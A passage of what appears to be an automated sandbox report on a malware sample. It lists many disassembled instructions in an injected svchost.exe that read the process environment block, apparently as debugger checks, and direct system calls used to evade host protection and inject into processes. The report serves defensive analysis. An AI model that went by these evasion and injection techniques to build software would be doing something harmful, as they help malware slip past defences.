                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4755 mov eax, dword ptr fs:[00000030h]2_2_031B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov esi, dword ptr fs:[00000030h]2_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]2_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]2_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138770 mov eax, dword ptr fs:[00000030h]2_2_03138770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D678E mov eax, dword ptr fs:[00000030h]2_2_031D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031307AF mov eax, dword ptr fs:[00000030h]2_2_031307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E47A0 mov eax, dword ptr fs:[00000030h]2_2_031E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313C7C0 mov eax, dword ptr fs:[00000030h]2_2_0313C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B07C3 mov eax, dword ptr fs:[00000030h]2_2_031B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]2_2_031347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]2_2_031347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE7E1 mov eax, dword ptr fs:[00000030h]2_2_031BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172619 mov eax, dword ptr fs:[00000030h]2_2_03172619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE609 mov eax, dword ptr fs:[00000030h]2_2_031AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E627 mov eax, dword ptr fs:[00000030h]2_2_0314E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03166620 mov eax, dword ptr fs:[00000030h]2_2_03166620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168620 mov eax, dword ptr fs:[00000030h]2_2_03168620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313262C mov eax, dword ptr fs:[00000030h]2_2_0313262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314C640 mov eax, dword ptr fs:[00000030h]2_2_0314C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03162674 mov eax, dword ptr fs:[00000030h]2_2_03162674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]2_2_031F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]2_2_031F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]2_2_0316A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]2_2_0316A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]2_2_03134690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]2_2_03134690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031666B0 mov eax, dword ptr fs:[00000030h]2_2_031666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C6A6 mov eax, dword ptr fs:[00000030h]2_2_0316C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0316A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A6C7 mov eax, dword ptr fs:[00000030h]2_2_0316A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B06F1 mov eax, dword ptr fs:[00000030h]2_2_031B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B06F1 mov eax, dword ptr fs:[00000030h]2_2_031B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6500 mov eax, dword ptr fs:[00000030h]2_2_031C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138550 mov eax, dword ptr fs:[00000030h]2_2_03138550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138550 mov eax, dword ptr fs:[00000030h]2_2_03138550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]2_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]2_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]2_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E59C mov eax, dword ptr fs:[00000030h]2_2_0316E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132582 mov eax, dword ptr fs:[00000030h]2_2_03132582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132582 mov ecx, dword ptr fs:[00000030h]2_2_03132582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03164588 mov eax, dword ptr fs:[00000030h]2_2_03164588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031545B1 mov eax, dword ptr fs:[00000030h]2_2_031545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031545B1 mov eax, dword ptr fs:[00000030h]2_2_031545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]2_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]2_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]2_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031365D0 mov eax, dword ptr fs:[00000030h]2_2_031365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A5D0 mov eax, dword ptr fs:[00000030h]2_2_0316A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A5D0 mov eax, dword ptr fs:[00000030h]2_2_0316A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E5CF mov eax, dword ptr fs:[00000030h]2_2_0316E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E5CF mov eax, dword ptr fs:[00000030h]2_2_0316E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031325E0 mov eax, dword ptr fs:[00000030h] 2_2_031325E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316C5ED mov eax, dword ptr fs:[00000030h] 2_2_0316C5ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03168402 mov eax, dword ptr fs:[00000030h] 2_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316A430 mov eax, dword ptr fs:[00000030h] 2_2_0316A430
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h] 2_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312C427 mov eax, dword ptr fs:[00000030h] 2_2_0312C427
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h] 2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312645D mov eax, dword ptr fs:[00000030h] 2_2_0312645D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315245A mov eax, dword ptr fs:[00000030h] 2_2_0315245A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h] 2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h] 2_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BC460 mov ecx, dword ptr fs:[00000030h] 2_2_031BC460
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031644B0 mov ecx, dword ptr fs:[00000030h] 2_2_031644B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_031BA4B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031364AB mov eax, dword ptr fs:[00000030h] 2_2_031364AB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031304E5 mov ecx, dword ptr fs:[00000030h] 2_2_031304E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h] 2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315EB20 mov eax, dword ptr fs:[00000030h] 2_2_0315EB20
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031F8B28 mov eax, dword ptr fs:[00000030h] 2_2_031F8B28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031DEB50 mov eax, dword ptr fs:[00000030h] 2_2_031DEB50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031E4B4B mov eax, dword ptr fs:[00000030h] 2_2_031E4B4B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031C6B40 mov eax, dword ptr fs:[00000030h] 2_2_031C6B40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031FAB40 mov eax, dword ptr fs:[00000030h] 2_2_031FAB40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031D8B42 mov eax, dword ptr fs:[00000030h] 2_2_031D8B42
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312CB7E mov eax, dword ptr fs:[00000030h] 2_2_0312CB7E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140BBE mov eax, dword ptr fs:[00000030h] 2_2_03140BBE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031E4BB0 mov eax, dword ptr fs:[00000030h] 2_2_031E4BB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_031DEBD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h] 2_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h] 2_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03138BF0 mov eax, dword ptr fs:[00000030h] 2_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315EBFC mov eax, dword ptr fs:[00000030h] 2_2_0315EBFC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_031BCBF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BCA11 mov eax, dword ptr fs:[00000030h] 2_2_031BCA11
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03154A35 mov eax, dword ptr fs:[00000030h] 2_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316CA38 mov eax, dword ptr fs:[00000030h] 2_2_0316CA38
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316CA24 mov eax, dword ptr fs:[00000030h] 2_2_0316CA24
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315EA2E mov eax, dword ptr fs:[00000030h] 2_2_0315EA2E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03136A50 mov eax, dword ptr fs:[00000030h] 2_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03140A5B mov eax, dword ptr fs:[00000030h] 2_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031ACA72 mov eax, dword ptr fs:[00000030h] 2_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316CA6F mov eax, dword ptr fs:[00000030h] 2_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031DEA60 mov eax, dword ptr fs:[00000030h] 2_2_031DEA60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03168A90 mov edx, dword ptr fs:[00000030h] 2_2_03168A90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0313EA80 mov eax, dword ptr fs:[00000030h] 2_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03204A80 mov eax, dword ptr fs:[00000030h] 2_2_03204A80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03138AA0 mov eax, dword ptr fs:[00000030h] 2_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03186AA4 mov eax, dword ptr fs:[00000030h] 2_2_03186AA4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03130AD0 mov eax, dword ptr fs:[00000030h] 2_2_03130AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03164AD0 mov eax, dword ptr fs:[00000030h] 2_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03186ACC mov eax, dword ptr fs:[00000030h] 2_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316AAEE mov eax, dword ptr fs:[00000030h] 2_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BC912 mov eax, dword ptr fs:[00000030h] 2_2_031BC912
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03128918 mov eax, dword ptr fs:[00000030h] 2_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031AE908 mov eax, dword ptr fs:[00000030h] 2_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B892A mov eax, dword ptr fs:[00000030h] 2_2_031B892A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031C892B mov eax, dword ptr fs:[00000030h] 2_2_031C892B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B0946 mov eax, dword ptr fs:[00000030h] 2_2_031B0946
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031D4978 mov eax, dword ptr fs:[00000030h] 2_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BC97C mov eax, dword ptr fs:[00000030h] 2_2_031BC97C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03156962 mov eax, dword ptr fs:[00000030h] 2_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0317096E mov eax, dword ptr fs:[00000030h] 2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0317096E mov edx, dword ptr fs:[00000030h] 2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B89B3 mov esi, dword ptr fs:[00000030h] 2_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B89B3 mov eax, dword ptr fs:[00000030h] 2_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031309AD mov eax, dword ptr fs:[00000030h] 2_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h] 2_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031649D0 mov eax, dword ptr fs:[00000030h] 2_2_031649D0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031FA9D3 mov eax, dword ptr fs:[00000030h] 2_2_031FA9D3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031C69C0 mov eax, dword ptr fs:[00000030h] 2_2_031C69C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031629F9 mov eax, dword ptr fs:[00000030h] 2_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BE9E0 mov eax, dword ptr fs:[00000030h] 2_2_031BE9E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BC810 mov eax, dword ptr fs:[00000030h] 2_2_031BC810
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03152835 mov eax, dword ptr fs:[00000030h] 2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03152835 mov ecx, dword ptr fs:[00000030h] 2_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316A830 mov eax, dword ptr fs:[00000030h] 2_2_0316A830
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031D483A mov eax, dword ptr fs:[00000030h] 2_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03160854 mov eax, dword ptr fs:[00000030h] 2_2_03160854
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03134859 mov eax, dword ptr fs:[00000030h] 2_2_03134859
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BE872 mov eax, dword ptr fs:[00000030h] 2_2_031BE872
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031C6870 mov eax, dword ptr fs:[00000030h] 2_2_031C6870
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031BC89D mov eax, dword ptr fs:[00000030h] 2_2_031BC89D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03130887 mov eax, dword ptr fs:[00000030h] 2_2_03130887
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0315E8C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0316C8F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031FA8E4 mov eax, dword ptr fs:[00000030h] 2_2_031FA8E4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03132F12 mov eax, dword ptr fs:[00000030h] 2_2_03132F12
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316CF1F mov eax, dword ptr fs:[00000030h] 2_2_0316CF1F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031E6F00 mov eax, dword ptr fs:[00000030h] 2_2_031E6F00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315EF28 mov eax, dword ptr fs:[00000030h] 2_2_0315EF28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0312CF50 mov eax, dword ptr fs:[00000030h] 2_2_0312CF50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0316CF50 mov eax, dword ptr fs:[00000030h] 2_2_0316CF50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03204F68 mov eax, dword ptr fs:[00000030h] 2_2_03204F68
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031D0F50 mov eax, dword ptr fs:[00000030h] 2_2_031D0F50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031B4F40 mov eax, dword ptr fs:[00000030h] 2_2_031B4F40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031D4F42 mov eax, dword ptr fs:[00000030h] 2_2_031D4F42
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0315AF69 mov eax, dword ptr fs:[00000030h] 2_2_0315AF69
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_031D2F60 mov eax, dword ptr fs:[00000030h] 2_2_031D2F60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03162F98 mov eax, dword ptr fs:[00000030h] 2_2_03162F98
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Code function: 0_2_00FE80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 0_2_00FE80A9
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Code function: 0_2_00FBA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00FBA155
                Source: C:\Users\user\Desktop\arGdXDmyGJ.exe Code function: 0_2_00FBA124 SetUnhandledExceptionFilter, 0_2_00FBA124

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtAllocateVirtualMemory: Direct from: 0x77172BFC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtDelayExecution: Direct from: 0x77172DDC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtQuerySystemInformation: Direct from: 0x77172DFC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtReadFile: Direct from: 0x77172ADC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtQueryInformationProcess: Direct from: 0x77172C26
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtResumeThread: Direct from: 0x77172FBC
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtWriteVirtualMemory: Direct from: 0x7717490C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtCreateUserProcess: Direct from: 0x7717371C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtOpenKeyEx: Direct from: 0x77172B9C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtNotifyChangeKey: Direct from: 0x77173C2C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtSetInformationProcess: Direct from: 0x77172C5C
                Source: C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\DKwZ8oxmXrzaXEMk9aGP.exe NtProtectVirtualMemory: Direct from: 0x77172F9C
